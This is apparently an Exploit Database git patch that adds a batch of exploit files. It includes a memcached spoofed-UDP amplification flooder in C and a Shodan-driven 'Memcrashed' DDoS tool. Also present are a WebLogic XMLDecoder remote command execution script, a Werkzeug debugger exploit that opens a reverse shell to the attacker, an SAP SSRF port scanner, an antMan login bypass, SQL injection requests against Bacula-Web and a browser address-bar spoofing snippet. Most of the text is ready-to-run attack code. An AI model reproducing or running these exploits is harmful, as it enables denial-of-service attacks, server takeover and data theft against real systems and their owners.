From 5947825a8490967127fbea0f782a3a40822947f8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 10 Mar 2018 05:01:50 +0000
Subject: [PATCH] DB: 2018-03-10
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

15 changes to exploits/shellcodes

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service
μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service

uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)
μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)

uTorrent WebUI 0.370 - Authorisation Header Denial of Service
μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service

Memcached - 'memcrashed' Denial of Service
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)
Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API
Broadcom BCM43xx Wi-Fi  - 'BroadPWN' Denial of Service
WebLog Expert Enterprise 9.4 - Denial of Service

uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking
μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking

uTorrent 2.0.3 - DLL Hijacking
μTorrent (uTorrent) 2.0.3 - DLL Hijacking

iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow
Microsoft Office - 'Composite Moniker Remote Code Execution
Mozilla Firefox - Address Bar Spoofing
Tor (Firefox 41 < 50) - Code Execution
Chrome 35.0.1916.153 - Sandbox Escape / Command Execution
WebLog Expert Enterprise 9.4 - Authentication Bypass

uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow

t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal
T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution

Werkzeug - 'Debug Shell' Command Execution

TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal
TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal

toronja CMS - SQL Injection
Toronja CMS - SQL Injection

uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery
μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
tinybrowser - 'tinybrowser.php' Directory Listing
tinybrowser - 'edit.php' Directory Listing
TinyBrowser - 'tinybrowser.php' Directory Listing
TinyBrowser - 'edit.php' Directory Listing

Xoops 2.5.7.2 - Directory Traversal Bypass
XOOPS 2.5.7.2 - Directory Traversal Bypass

SAP BusinessObjects launch pad - Server-Side Request Forgery

antMan < 0.9.1a - Authentication Bypass

Bacula-Web < 8.0.0-rc2 - SQL Injection
---
 exploits/android/dos/44268.txt      |   3 +
 exploits/linux/dos/44264.c          | 228 ++++++++++++++++++++++++++++
 exploits/linux/dos/44265.py         | 170 +++++++++++++++++++++
 exploits/multiple/local/44266.html  |   3 +
 exploits/multiple/remote/43392.py   |  61 ++++++++
 exploits/multiple/remote/43905.py   |  55 +++++++
 exploits/multiple/webapps/43404.py  |  99 ++++++++++++
 exploits/multiple/webapps/44220.txt |  39 +++++
 exploits/php/webapps/44272.txt      |  55 +++++++
 exploits/windows/dos/44271.py       |  92 +++++++++++
 exploits/windows/local/44224.py     |  51 +++++++
 exploits/windows/local/44263.md     |  31 ++++
 exploits/windows/local/44267.md     |  12 ++
 exploits/windows/local/44269.txt    |   3 +
 exploits/windows/local/44270.txt    |  91 +++++++++++
 files_exploits.csv                  |  43 ++++--
 16 files changed, 1022 insertions(+), 14 deletions(-)
 create mode 100644 exploits/android/dos/44268.txt
 create mode 100644 exploits/linux/dos/44264.c
 create mode 100755 exploits/linux/dos/44265.py
 create mode 100644 exploits/multiple/local/44266.html
 create mode 100755 exploits/multiple/remote/43392.py
 create mode 100755 exploits/multiple/remote/43905.py
 create mode 100755 exploits/multiple/webapps/43404.py
 create mode 100644 exploits/multiple/webapps/44220.txt
 create mode 100644 exploits/php/webapps/44272.txt
 create mode 100755 exploits/windows/dos/44271.py
 create mode 100755 exploits/windows/local/44224.py
 create mode 100644 exploits/windows/local/44263.md
 create mode 100644 exploits/windows/local/44267.md
 create mode 100644 exploits/windows/local/44269.txt
 create mode 100644 exploits/windows/local/44270.txt

diff --git a/exploits/android/dos/44268.txt b/exploits/android/dos/44268.txt
new file mode 100644
index 000000000..e063c6b86
--- /dev/null
+++ b/exploits/android/dos/44268.txt
@@ -0,0 +1,3 @@
+This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44268.zip
\ No newline at end of file
diff --git a/exploits/linux/dos/44264.c b/exploits/linux/dos/44264.c
new file mode 100644
index 000000000..1b7a3ce7f
--- /dev/null
+++ b/exploits/linux/dos/44264.c
@@ -0,0 +1,228 @@
+/**
+memcached-PoC
+
+memcached Proof of Concept Amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP hosts.
+
+memcached.c - Source code (https://pastebin.com/raw/ZiUeinae)
+memecache-amp-03-05-2018-rd.list - List of memcached servers as of 03-05-2018 (https://pastebin.com/raw/eSCHTTVu)
+
+Compile: gcc memcached.c -o memecached -pthread
+
+*Educational and/or testing purposes only. *Use of these tools against an unauthorized party may be unethtical, rude, and even illegal in some countries.
+
+**/
+
+/* 
+   memcache reflection script
+   greeting: syn, storm, krashed, chrono, spike, niko, disliked
+   Use with extreme Caution
+*/
+
+#include <time.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 8192
+#define PHI 0x9e3779b9
+static uint32_t Q[4096], c = 362436;
+struct list
+{
+	struct sockaddr_in data;
+	struct list *next;
+	struct list *prev;
+};
+struct list *head;
+volatile int tehport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
+void init_rand(uint32_t x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++)
+	{
+	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
+	}
+}
+uint32_t rand_cmwc(void)
+{
+	uint64_t t, a = 18782LL;
+	static uint32_t i = 4095;
+	uint32_t x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+	x++;
+	c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int nwords)
+{
+	unsigned long sum = 0;
+	for (sum = 0; nwords > 0; nwords--)
+	sum += *buf++;
+	sum = (sum >> 16) + (sum & 0xffff);
+	sum += (sum >> 16);
+	return (unsigned short)(~sum);
+}
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 15;
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = IPPROTO_UDP;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+void setup_udp_header(struct udphdr *udph)
+{
+	udph->source = htons(5678);
+	udph->dest = htons(11211);
+	udph->check = 0;
+	memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15);
+	udph->len=htons(sizeof(struct udphdr) + 15);
+}
+void *flood(void *par1)
+{
+	struct thread_data *td = (struct thread_data *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
+	struct sockaddr_in sin = td->sin;
+	struct  list *list_node = td->list_node;
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+	fprintf(stderr, "Could not open raw socket.\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_udp_header(udph);
+	udph->source = htons(rand() % 65535 - 1026);
+	iph->saddr = sin.sin_addr.s_addr;
+	iph->daddr = list_node->data.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
+		list_node = list_node->next;
+		iph->daddr = list_node->data.sin_addr.s_addr;
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+	fprintf(stderr, "Invalid parameters!\n");
+	fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+	srand(time(NULL));
+	int i = 0;
+	head = NULL;
+	fprintf(stdout, "Setting up sockets...\n");
+	int max_len = 128;
+	char *buffer = (char *) malloc(max_len);
+	buffer = memset(buffer, 0x00, max_len);
+	int num_threads = atoi(argv[4]);
+	int maxpps = atoi(argv[5]);
+	limiter = 0;
+	pps = 0;
+	int multiplier = 20;
+	FILE *list_fd = fopen(argv[3],  "r");
+	while (fgets(buffer, max_len, list_fd) != NULL) {
+		if ((buffer[strlen(buffer) - 1] == '\n') ||
+				(buffer[strlen(buffer) - 1] == '\r')) {
+			buffer[strlen(buffer) - 1] = 0x00;
+			if(head == NULL)
+			{
+				head = (struct list *)malloc(sizeof(struct list));
+				bzero(&head->data, sizeof(head->data));
+				head->data.sin_addr.s_addr=inet_addr(buffer);
+				head->next = head;
+				head->prev = head;
+			} else {
+				struct list *new_node = (struct list *)malloc(sizeof(struct list));
+				memset(new_node, 0x00, sizeof(struct list));
+				new_node->data.sin_addr.s_addr=inet_addr(buffer);
+				new_node->prev = head;
+				new_node->next = head->next;
+				head->next = new_node;
+			}
+			i++;
+		} else {
+			continue;
+		}
+	}
+	struct list *current = head->next;
+	pthread_t thread[num_threads];
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_addr.s_addr = inet_addr(argv[1]);
+	struct thread_data td[num_threads];
+	for(i = 0;i<num_threads;i++){
+		td[i].thread_id = i;
+		td[i].sin= sin;
+		td[i].list_node = current;
+		pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
+	}
+	fprintf(stdout, "Starting flood...\n");
+	for(i = 0;i<(atoi(argv[6])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/dos/44265.py b/exploits/linux/dos/44265.py
new file mode 100755
index 000000000..a9163efb6
--- /dev/null
+++ b/exploits/linux/dos/44265.py
@@ -0,0 +1,170 @@
+#-- coding: utf8 --
+#!/usr/bin/python
+# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44265.zip
+
+import sys, os, time, shodan
+from pathlib import Path
+from scapy.all import *
+from contextlib import contextmanager
+
+starttime=time.time()
+
+@contextmanager
+def suppress_stdout():
+    with open(os.devnull, "w") as devnull:
+        old_stdout = sys.stdout
+        sys.stdout = devnull
+        try:  
+            yield
+        finally:
+            sys.stdout = old_stdout
+
+class color:
+    HEADER = '\033[0m'
+
+keys = Path("./api.txt")
+logo = color.HEADER + '''
+
+   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗ 
+   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗
+   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║
+   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║
+   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝
+   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
+
+                                        Author: @037
+                                        Version: 3.1
+
+####################################### DISCLAIMER ########################################
+| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |
+| memcached servers. It then allows you to use the same servers to launch widespread      |
+| distributed denial of service attacks by forging UDP packets sourced to your victim.    |
+| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
+| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |
+| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
+###########################################################################################
+                                                                                      
+'''
+print(logo)
+
+if keys.is_file():
+    with open('api.txt', 'r') as file:
+        SHODAN_API_KEY=file.readlines()
+else:
+    file = open('api.txt', 'w')
+    SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')
+    file.write(SHODAN_API_KEY)
+    print('[~] File written: ./api.txt')
+    file.close()
+
+while True:
+    api = shodan.Shodan(SHODAN_API_KEY)
+    print('')
+    try:
+        myresults = Path("./bots.txt")
+        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
+        if query.startswith('y'):
+            print('')
+            print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
+            results = api.search('product:"Memcached" port:11211')
+            print('[✓] API Key Authentication: SUCCESS')
+            print('[~] Number of bots: %s' % results['total'])
+            print('')
+            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()
+            if saveresult.startswith('y'):
+                file2 = open('bots.txt', 'a')
+                for result in results['matches']:
+                    file2.write(result['ip_str'] + "\n")
+                print('[~] File written: ./bots.txt')
+                print('')
+                file2.close()
+        saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()
+        if myresults.is_file():
+            if saveme.startswith('y'):
+                ip_arrayn = []
+                with open('bots.txt') as my_file:
+                    for line in my_file:
+                        ip_arrayn.append(line)
+                ip_array = [s.rstrip() for s in ip_arrayn]
+        else:
+            print('')
+            print('[✘] Error: No bots stored locally, bots.txt file not found!')
+            print('')
+        if saveme.startswith('y') or query.startswith('y'):
+            print('')
+            target = input("[▸] Enter target IP address: ")
+            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
+            data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
+            print('')
+            if query.startswith('y'):
+                iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()
+                if iplist.startswith('y'):
+                    print('')
+                    counter= int(0)
+                    for result in results['matches']:
+                        host = api.host('%s' % result['ip_str'])
+                        counter=counter+1
+                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
+                        time.sleep(2.0 - ((time.time() - starttime) % 2.0))
+            if saveme.startswith('y'):
+                iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower()
+                if iplistlocal.startswith('y'):
+                    print('')
+                    counter= int(0)
+                    for x in ip_array:
+                        host = api.host('%s' % x)
+                        counter=counter+1
+                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
+                        time.sleep(2.0 - ((time.time() - starttime) % 2.0))
+            print('')
+            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
+            if engage.startswith('y'):
+                if saveme.startswith('y'):
+                    for i in ip_array:
+                        if power>1:
+                            print('[+] Sending %d forged UDP packets to: %s' % (power, i))
+                            with suppress_stdout():
+                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
+                        elif power==1:
+                            print('[+] Sending 1 forged UDP packet to: %s' % i)
+                            with suppress_stdout():
+                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
+                else:
+                    for result in results['matches']:
+                        if power>1:
+                            print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
+                            with suppress_stdout():
+                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
+                        elif power==1:
+                            print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
+                            with suppress_stdout():
+                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
+                print('')
+                print('[•] Task complete! Exiting Platform. Have a wonderful day.')
+                break
+            else:
+                print('')
+                print('[✘] Error: %s not engaged!' % target)
+                print('[~] Restarting Platform! Please wait.')
+                print('')
+        else:
+            print('')
+            print('[✘] Error: No bots stored locally or remotely on Shodan!')
+            print('[~] Restarting Platform! Please wait.')
+            print('')
+
+    except shodan.APIError as e:
+            print('[✘] Error: %s' % e)
+            option = input('[*] Would you like to change API Key? <Y/n>: ').lower()
+            if option.startswith('y'):
+                file = open('api.txt', 'w')
+                SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ')
+                file.write(SHODAN_API_KEY)
+                print('[~] File written: ./api.txt')
+                file.close()
+                print('[~] Restarting Platform! Please wait.')
+                print('')
+            else:
+                print('')
+                print('[•] Exiting Platform. Have a wonderful day.')
+                break
\ No newline at end of file
diff --git a/exploits/multiple/local/44266.html b/exploits/multiple/local/44266.html
new file mode 100644
index 000000000..82c2b5642
--- /dev/null
+++ b/exploits/multiple/local/44266.html
@@ -0,0 +1,3 @@
+<script>
+location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
+</script>
\ No newline at end of file
diff --git a/exploits/multiple/remote/43392.py b/exploits/multiple/remote/43392.py
new file mode 100755
index 000000000..8e7e4dc5e
--- /dev/null
+++ b/exploits/multiple/remote/43392.py
@@ -0,0 +1,61 @@
+import requests
+import sys
+
+url_in = sys.argv[1]
+payload_url = url_in + "/wls-wsat/CoordinatorPortType"
+payload_header = {'content-type': 'text/xml'}
+
+
+def payload_command (command_in):
+    html_escape_table = {
+        "&": "&",
+        '"': """,
+        "'": "&apos;",
+        ">": ">",
+        "<": "<",
+    }
+    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
+    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
+                "   <soapenv:Header> " \
+                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
+                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
+                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
+                "                  <array class=\"java.lang.String\" length=\"3\">" \
+                "                      <void index = \"0\">                       " \
+                "                          <string>cmd</string>                 " \
+                "                      </void>                                    " \
+                "                      <void index = \"1\">                       " \
+                "                          <string>/c</string>                  " \
+                "                      </void>                                    " \
+                "                      <void index = \"2\">                       " \
+                + command_filtered + \
+                "                      </void>                                    " \
+                "                  </array>" \
+                "                  <void method=\"start\"/>" \
+                "                  </void>" \
+                "            </java>" \
+                "        </work:WorkContext>" \
+                "   </soapenv:Header>" \
+                "   <soapenv:Body/>" \
+                "</soapenv:Envelope>"
+    return payload_1
+
+def do_post(command_in):
+    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
+
+    if result.status_code == 500:
+        print "Command Executed \n"
+    else:
+        print "Something Went Wrong \n"
+
+
+
+print "***************************************************** \n" \
+       "****************   Coded By 1337g  ****************** \n" \
+       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
+       "***************************************************** \n"
+
+while 1:
+    command_in = raw_input("Eneter your command here: ")
+    if command_in == "exit" : exit(0)
+    do_post(command_in)
\ No newline at end of file
diff --git a/exploits/multiple/remote/43905.py b/exploits/multiple/remote/43905.py
new file mode 100755
index 000000000..6d81b108e
--- /dev/null
+++ b/exploits/multiple/remote/43905.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+import requests
+import sys
+import re
+import urllib
+
+# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 
+
+if len(sys.argv) != 5:
+    print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
+    sys.exit(-1)
+
+
+response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
+
+if "Werkzeug " not in response.text:
+    print "[-] Debug is not enabled"
+    sys.exit(-1)
+
+# since the application or debugger about python using python for reverse connect 
+cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' % (sys.argv[3],sys.argv[4])
+
+__debugger__ = 'yes'
+
+frm = '0'
+
+response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
+
+secret = re.findall("[0-9a-zA-Z]{20}",response.text)
+
+if len(secret) != 1:
+    print "[-] Impossible to get SECRET"
+    sys.exit(-1)
+else:
+    secret = secret[0]
+    print "[+] SECRET is: "+str(secret)
+
+# shell
+print "[+] Sending reverse shell to %s:%s, please  use netcat listening in %s:%s" % (sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
+
+raw_input("PRESS ENTER TO EXPLOIT")
+
+data = {
+        '__debugger__' : __debugger__,
+        'cmd' : str(cmd),
+        'frm' : frm,
+        's' : secret
+        }
+
+
+response = requests.get("http://%s:%s/console" % (sys.argv[1],sys.argv[2]), params=data,headers=response.headers)
+
+print "[+] response from server"
+print "status code: " + str(response.status_code)
+print "response: "+ str(response.text)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/43404.py b/exploits/multiple/webapps/43404.py
new file mode 100755
index 000000000..234dba7d7
--- /dev/null
+++ b/exploits/multiple/webapps/43404.py
@@ -0,0 +1,99 @@
+# Exploit Title: SAP BusinessObjects launch pad SSRF
+# Date: 2017-11-8
+# Exploit Author: Ahmad Mahfouz
+# Category: Webapps
+# Author Homepage: www.unixawy.com
+# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack 
+
+ 
+#!/usr/bin/env python
+# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
+# usage : sblpta.py http://path.faces targetIP targetPort
+import urllib2
+import urllib
+import ssl
+from datetime import datetime
+import sys
+
+ 
+
+if len(sys.argv) != 4:
+
+   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
+   sys.exit(1)
+
+url = sys.argv[1]
+targetIP = sys.argv[2]
+targetPort = sys.argv[3]
+targetHostIP = "%s:%s" %(targetIP,targetPort)
+print "\r\n" 
+print "[*] SAP BusinessObjects Timing Attack"
+headers = {'User-Agent': 'Mozilla/5.0'}
+gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
+
+try:
+
+   request = urllib2.Request(url, headers=headers)
+   page = urllib2.urlopen(request, context=gcontext)
+   print "[*] Connected to SAP Bussiness Object %s"  %url
+
+except:
+
+   print "[-] Failed To connect to SAP Bussiness Object %s" %url
+   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
+   sys.exit(2)
+
+ 
+resheaders = page.info()
+cookie = resheaders.dict['set-cookie']
+content = page.readlines()
+
+for line in content:
+
+   if "com.sun.faces.VIEW" in line:
+      sfview = line.split("=")[4].split("\"")[1]
+      print "[*] Got java faces dynamic value"
+
+   else:
+      continue
+
+if not sfview:
+
+   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
+   sys.exit(3)
+
+
+formdata = {"_id0:logon:CMS":targetHostIP,
+         "_id0:logon:USERNAME":"",
+         "_id0:logon:PASSWORD":"",
+         "com.sun.faces.VIEW":sfview,
+         "_id0":"_id0"
+         }
+
+ 
+
+data_encode = urllib.urlencode(formdata)
+start =  datetime.now()
+print "[*] Testing Timing Attack %s" %start        
+request = urllib2.Request(url,data_encode)
+request.add_header('Cookie', cookie)
+response  = urllib2.urlopen(request)
+end = datetime.now()
+the_page = response.read()
+
+
+if "FWM" in the_page:
+ 
+   elapsedTime = end-start
+   if elapsedTime.total_seconds() >= 10:
+
+      print "[*] Port %s is Open, Gotcha !!! " %targetPort
+
+   else:
+
+      print "[*] Port %s is Closed , we die fast"  %targetPort
+
+elif "FWC" in the_page:
+
+   print "[-] error login expired"
+   sys.exit(10)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44220.txt b/exploits/multiple/webapps/44220.txt
new file mode 100644
index 000000000..d2bf955e4
--- /dev/null
+++ b/exploits/multiple/webapps/44220.txt
@@ -0,0 +1,39 @@
+# Exploit Title: antMan <= 0.9.0c Authentication Bypass
+# Date: 02-27-2018
+# Software Link: https://www.antsle.com
+# Version: <= 0.9.0c
+# Tested on: 0.9.0c
+# Exploit Author: Joshua Bowser
+# Contact: joshua.bowser@codecatoctin.com
+# Website: http://www.codecatoctin.com
+# Category: web apps
+ 
+1. Description
+   
+antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
+ 
+http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
+ 
+   
+2. Proof of Concept
+ 
+The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
+
+This script contains two critical defects that allow an attacker to bypass the authentication checks.  By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
+
+To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
+
+#-------------------------
+POST /login HTTP/1.1
+Host: 10.1.1.7:3000
+[snip]
+
+username= > &password=%0a
+#-------------------------
+
+You will now be successfully authenticated to antMan as the administrative root user.
+ 
+   
+3. Solution:
+   
+Update to version 0.9.1a
\ No newline at end of file
diff --git a/exploits/php/webapps/44272.txt b/exploits/php/webapps/44272.txt
new file mode 100644
index 000000000..f1920eeb6
--- /dev/null
+++ b/exploits/php/webapps/44272.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Multiple SQL injection vulnerabilities in Bacula-Web
+# Date: 2018-03-07
+# Software Link: http://bacula-web.org/
+# Exploit Author: Gustavo Sorondo
+# Contact: http://twitter.com/iampuky
+# Website: http://cintainfinita.com/
+# CVE: CVE-2017-15367
+# Category: webapps
+
+1. Description
+
+Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection
+vulnerabilities that could allow an attacker to access the Bacula database
+and, depending on configuration, escalate privileges on the server.
+
+2. Proofs of Concept
+
+2.1) The /jobs.php script is affected by a SQL Injection vulnerability.
+
+The following GET request can be used to extract the result of "select
+@@version" query.
+
+Request:
+GET
+/jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
+HTTP/1.1
+
+Response:
+HTTP/1.1 200 OK
+[...]
+            <td>5.7.19-0ubuntu0.16.04.1</td>
+            <td class="text-left">
+             backupjob-report.php?backupjob_name=
+[...]
+
+Other parameters (eg. client_id) are also vulnerable, since there is no
+protection against SQL Injections at all.
+
+2.2) The /backupjob-report.php script is affected by a SQL Injection
+vulnerability.
+
+The following GET request can be used to extract the result of "select
+@@version" query.
+
+Request:
+GET
+/client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23
+
+2.3) The /client-report.php is affected by a SQL Injection vulnerability in
+the "client_id" parameter.
+
+3. Solution:
+
+Update to version 8.0.0-RC2
+http://bacula-web.org/news-reader/bacula-web-8-0-0-rc2-released.html
\ No newline at end of file
diff --git a/exploits/windows/dos/44271.py b/exploits/windows/dos/44271.py
new file mode 100755
index 000000000..5e2be5d74
--- /dev/null
+++ b/exploits/windows/dos/44271.py
@@ -0,0 +1,92 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
